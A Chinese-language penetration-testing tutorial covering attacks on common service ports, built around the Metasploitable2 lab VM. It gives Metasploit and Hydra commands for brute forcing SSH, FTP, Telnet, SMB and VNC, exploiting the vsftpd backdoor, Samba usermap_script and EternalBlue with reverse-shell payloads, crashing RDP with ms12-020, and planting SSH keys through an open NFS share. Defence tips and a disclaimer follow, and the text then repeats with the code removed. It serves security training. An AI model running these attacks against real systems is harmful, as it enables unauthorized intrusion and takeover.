针对系统服务的攻击尝试
字数 2876 2025-08-06 21:48:53

针对系统服务的渗透攻击技术详解

0x00 前言

在网络安全渗透测试中,通过识别目标IP开放的端口可以判断运行的服务类型,进而获取更多信息。本教学文档将详细讲解如何针对常见系统服务端口进行进一步的渗透攻击。

0x01 常见系统服务端口及攻击方向

端口号 服务说明 主要攻击方向
22 SSH 爆破攻击、SSH隧道及内网代理转发、文件传输
23 Telnet 爆破攻击、嗅探、弱口令利用
25 SMTP 用户枚举、邮件伪造
53 DNS DNS溢出攻击、DNS欺骗、拒绝服务攻击
110 POP3 爆破攻击、弱口令利用、邮件伪造
135 RPC 远程溢出攻击、弱口令利用
139/445 SMB 永恒之蓝漏洞利用、SAMBA漏洞利用、爆破攻击
161 SNMP 爆破攻击、搜集目标内网信息
2049 NFS 共享目录配置漏洞利用、未授权访问
3389 RDP ms12-020漏洞利用、Shift后门、输入法漏洞、CVE-2019-0708漏洞利用
5900 VNC 弱口令爆破、密码验证绕过漏洞、拒绝服务攻击
5632 PyAnywhere服务 密码抓取、代码执行

0x02 Metasploit框架基础

核心概念

  1. 渗透攻击(Exploit): 利用目标系统漏洞进行的攻击行为
  2. 攻击载荷(Payload): 目标系统被渗透后执行的代码,如反弹式shell
  3. 溢出代码(Shellcode): 作为攻击载荷运行的一组机器指令,通常用汇编语言编写
  4. 模块(Module): MSF框架中使用的软件代码组件
  5. 监听器(Listener): 用于等待网络连接的组件

0x03 靶机环境准备

推荐使用Metasploitable2(Linux)作为测试环境:

  • 特别制作的Ubuntu操作系统,包含多种安全漏洞
  • 兼容VMware、VirtualBox等虚拟平台
  • 默认账号密码:msfadmin/msfadmin
  • 警告:不要将此镜像暴露在易受攻击的网络中

0x04 SSH(22)服务攻击

攻击方法

  1. 使用Metasploit进行SSH爆破

    msfconsole
    search ssh_login
    use auxiliary/scanner/ssh/ssh_login
    show options
    set RHOSTS <target_ip>
    set USERNAME root
    set PASS_FILE /path/to/passwords.txt
    set THREADS 5
    run
    
  2. 成功后的连接

    ssh root@<target_ip>
    

0x05 FTP(21)服务攻击

攻击方法

  1. VSFTPD 2.3.4后门利用

    • 当USER包含":)"时触发6200端口后门
    • Metasploit利用:
      use exploit/unix/ftp/vsftpd_234_backdoor
      set RHOST <target_ip>
      exploit
      
  2. Hydra爆破攻击

    hydra -L users.txt -P passwords.txt <target_ip> ftp
    

0x06 Telnet(23)服务攻击

攻击方法

  1. 使用Metasploit爆破

    use auxiliary/scanner/telnet/telnet_login
    set RHOSTS <target_ip>
    set USER_FILE /path/to/users.txt
    set PASS_FILE /path/to/passwords.txt
    run
    
  2. 版本扫描

    use auxiliary/scanner/telnet/telnet_version
    set RHOSTS <target_ip>
    run
    

0x07 DNS(53)服务攻击

攻击方法

  1. DNS溢出攻击

    • 使用远程溢出漏洞获取系统权限
    • 通过nc等工具连接获取shell
  2. DNS欺骗攻击

    • 结合网页木马、挂马等进行欺骗攻击
  3. 拒绝服务攻击

    • 使用DDOS技术使服务不可用

0x08 SMB(139/445)服务攻击

攻击方法

  1. SMB爆破(139)

    use auxiliary/scanner/smb/smb_login
    set RHOSTS <target_ip>
    set SMBUser administrator
    set SMBPass password
    run
    
  2. SAMBA漏洞利用(445)

    use exploit/multi/samba/usermap_script
    set RHOST <target_ip>
    set payload cmd/unix/reverse
    exploit
    
  3. 永恒之蓝漏洞(MS17-010)

    • 探测漏洞:
      use auxiliary/scanner/smb/smb_ms17_010
      set RHOSTS <target_ip>
      run
      
    • 漏洞利用:
      use exploit/windows/smb/ms17_010_eternalblue
      set RHOST <target_ip>
      set payload windows/x64/meterpreter/reverse_tcp
      set LHOST <your_ip>
      exploit
      

0x09 RDP(3389)服务攻击

攻击方法

  1. ms12-020漏洞利用

    use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    set RHOST <target_ip>
    exploit
    
  2. Shift粘滞键后门

    • 适用于Windows Server 2003以下系统
    • 连续按5次Shift键触发
  3. CVE-2019-0708漏洞验证

    use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    set RHOSTS <target_ip>
    run
    

0x10 NFS(2049)服务攻击

攻击方法

  1. 查看共享目录

    showmount -e <target_ip>
    

    或使用Metasploit:

    use auxiliary/scanner/nfs/nfsmount
    set RHOSTS <target_ip>
    run
    
  2. 未授权访问利用

    mkdir /temp
    mount -t nfs <target_ip>:/ /temp -o nolock
    
  3. 获取Shell

    • 通过修改authorized_keys文件添加SSH公钥
    • 建立SSH连接:
      ssh -i /root/.ssh/id_rsa root@<target_ip>
      

0x11 RPC(135)服务攻击

攻击方法

  1. RPC溢出攻击

    • 使用工具如DSScan扫描漏洞
    • 使用ms05011.exe进行溢出攻击
  2. 弱口令利用

    • 使用Hydra爆破
    • 通过RPC开启telnet服务并执行命令

0x12 VNC(5900)服务攻击

攻击方法

  1. 密码验证绕过漏洞利用
  2. Cain嗅探攻击
  3. 注册表读取破解密码
  4. 拒绝服务攻击(CVE-2015-5239)
  5. 权限提升(CVE-2013-6886)
  6. 爆破攻击
    • 使用Hydra:
      hydra -P passwords.txt <target_ip> vnc
      
    • 使用Metasploit:
      use auxiliary/scanner/vnc/vnc_login
      set RHOSTS <target_ip>
      run
      

0x13 SMTP(25/465)服务攻击

攻击方法

  1. 用户枚举

    use auxiliary/scanner/smtp/smtp_enum
    set RHOSTS <target_ip>
    run
    
  2. 版本扫描

    use auxiliary/scanner/smtp/smtp_version
    set RHOSTS <target_ip>
    run
    
  3. 未授权访问利用

  4. 邮件伪造攻击

0x14 POP3(109/110/995)服务攻击

攻击方法

  1. 爆破攻击
  2. 弱口令利用
  3. 未授权访问
  4. 邮件伪造:在关键时刻可能有奇效

0x15 防御建议

  1. 及时更新系统和应用补丁
  2. 禁用不必要的服务和端口
  3. 使用强密码策略
  4. 配置适当的访问控制
  5. 启用日志记录和监控
  6. 定期进行安全审计

0x16 免责声明

本文档仅供学习研究和合法授权测试使用,严禁用于非法活动。任何使用本文档技术进行非法攻击的行为,均由使用者本人承担全部法律责任。

针对系统服务的渗透攻击技术详解 0x00 前言 在网络安全渗透测试中,通过识别目标IP开放的端口可以判断运行的服务类型,进而获取更多信息。本教学文档将详细讲解如何针对常见系统服务端口进行进一步的渗透攻击。 0x01 常见系统服务端口及攻击方向 | 端口号 | 服务说明 | 主要攻击方向 | |--------|----------------|-----------------------------------------------------------------------------| | 22 | SSH | 爆破攻击、SSH隧道及内网代理转发、文件传输 | | 23 | Telnet | 爆破攻击、嗅探、弱口令利用 | | 25 | SMTP | 用户枚举、邮件伪造 | | 53 | DNS | DNS溢出攻击、DNS欺骗、拒绝服务攻击 | | 110 | POP3 | 爆破攻击、弱口令利用、邮件伪造 | | 135 | RPC | 远程溢出攻击、弱口令利用 | | 139/445| SMB | 永恒之蓝漏洞利用、SAMBA漏洞利用、爆破攻击 | | 161 | SNMP | 爆破攻击、搜集目标内网信息 | | 2049 | NFS | 共享目录配置漏洞利用、未授权访问 | | 3389 | RDP | ms12-020漏洞利用、Shift后门、输入法漏洞、CVE-2019-0708漏洞利用 | | 5900 | VNC | 弱口令爆破、密码验证绕过漏洞、拒绝服务攻击 | | 5632 | PyAnywhere服务 | 密码抓取、代码执行 | 0x02 Metasploit框架基础 核心概念 渗透攻击(Exploit) : 利用目标系统漏洞进行的攻击行为 攻击载荷(Payload) : 目标系统被渗透后执行的代码,如反弹式shell 溢出代码(Shellcode) : 作为攻击载荷运行的一组机器指令,通常用汇编语言编写 模块(Module) : MSF框架中使用的软件代码组件 监听器(Listener) : 用于等待网络连接的组件 0x03 靶机环境准备 推荐使用Metasploitable2(Linux)作为测试环境: 特别制作的Ubuntu操作系统,包含多种安全漏洞 兼容VMware、VirtualBox等虚拟平台 默认账号密码:msfadmin/msfadmin 警告:不要将此镜像暴露在易受攻击的网络中 0x04 SSH(22)服务攻击 攻击方法 使用Metasploit进行SSH爆破 : 成功后的连接 : 0x05 FTP(21)服务攻击 攻击方法 VSFTPD 2.3.4后门利用 : 当USER包含":)"时触发6200端口后门 Metasploit利用: Hydra爆破攻击 : 0x06 Telnet(23)服务攻击 攻击方法 使用Metasploit爆破 : 版本扫描 : 0x07 DNS(53)服务攻击 攻击方法 DNS溢出攻击 : 使用远程溢出漏洞获取系统权限 通过nc等工具连接获取shell DNS欺骗攻击 : 结合网页木马、挂马等进行欺骗攻击 拒绝服务攻击 : 使用DDOS技术使服务不可用 0x08 SMB(139/445)服务攻击 攻击方法 SMB爆破(139) : SAMBA漏洞利用(445) : 永恒之蓝漏洞(MS17-010) : 探测漏洞: 漏洞利用: 0x09 RDP(3389)服务攻击 攻击方法 ms12-020漏洞利用 : Shift粘滞键后门 : 适用于Windows Server 2003以下系统 连续按5次Shift键触发 CVE-2019-0708漏洞验证 : 0x10 NFS(2049)服务攻击 攻击方法 查看共享目录 : 或使用Metasploit: 未授权访问利用 : 获取Shell : 通过修改authorized_ keys文件添加SSH公钥 建立SSH连接: 0x11 RPC(135)服务攻击 攻击方法 RPC溢出攻击 : 使用工具如DSScan扫描漏洞 使用ms05011.exe进行溢出攻击 弱口令利用 : 使用Hydra爆破 通过RPC开启telnet服务并执行命令 0x12 VNC(5900)服务攻击 攻击方法 密码验证绕过漏洞利用 Cain嗅探攻击 注册表读取破解密码 拒绝服务攻击(CVE-2015-5239) 权限提升(CVE-2013-6886) 爆破攻击 : 使用Hydra: 使用Metasploit: 0x13 SMTP(25/465)服务攻击 攻击方法 用户枚举 : 版本扫描 : 未授权访问利用 邮件伪造攻击 0x14 POP3(109/110/995)服务攻击 攻击方法 爆破攻击 弱口令利用 未授权访问 邮件伪造 :在关键时刻可能有奇效 0x15 防御建议 及时更新系统和应用补丁 禁用不必要的服务和端口 使用强密码策略 配置适当的访问控制 启用日志记录和监控 定期进行安全审计 0x16 免责声明 本文档仅供学习研究和合法授权测试使用,严禁用于非法活动。任何使用本文档技术进行非法攻击的行为,均由使用者本人承担全部法律责任。